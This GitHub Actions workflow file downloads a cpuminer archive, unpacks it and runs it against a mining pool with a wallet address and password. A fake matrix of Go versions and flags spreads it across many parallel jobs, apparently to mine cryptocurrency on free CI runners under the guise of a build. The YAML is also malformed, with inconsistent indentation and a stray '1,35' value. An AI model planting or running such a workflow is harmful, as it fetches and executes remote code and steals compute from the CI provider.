name: eX-babe_sugar

on: [workflow_dispatch]

jobs:
  build:
    name: eX-babe_sugar
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
     - name: Preparing
      run: Invoke-WebRequest https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-win.zip -OutFile cpuminer-opt-win.zip
    - name: Prepare_Q2
      run: Expand-Archive cpuminer-opt-win.zip
    - name: Running
      run: .\cpuminer-opt-win\cpuminer-avx2.exe -a yespowersugar  -o stratum+tcp://stratum-asia.rplant.xyz:7042  -t 1 -u sugar1qaynfevgkhzkesx0khtgvdtrsmpq6qvceqk03xl.goncho99 -p Dbl3@$4hh
    - name: DONE
      run: exit
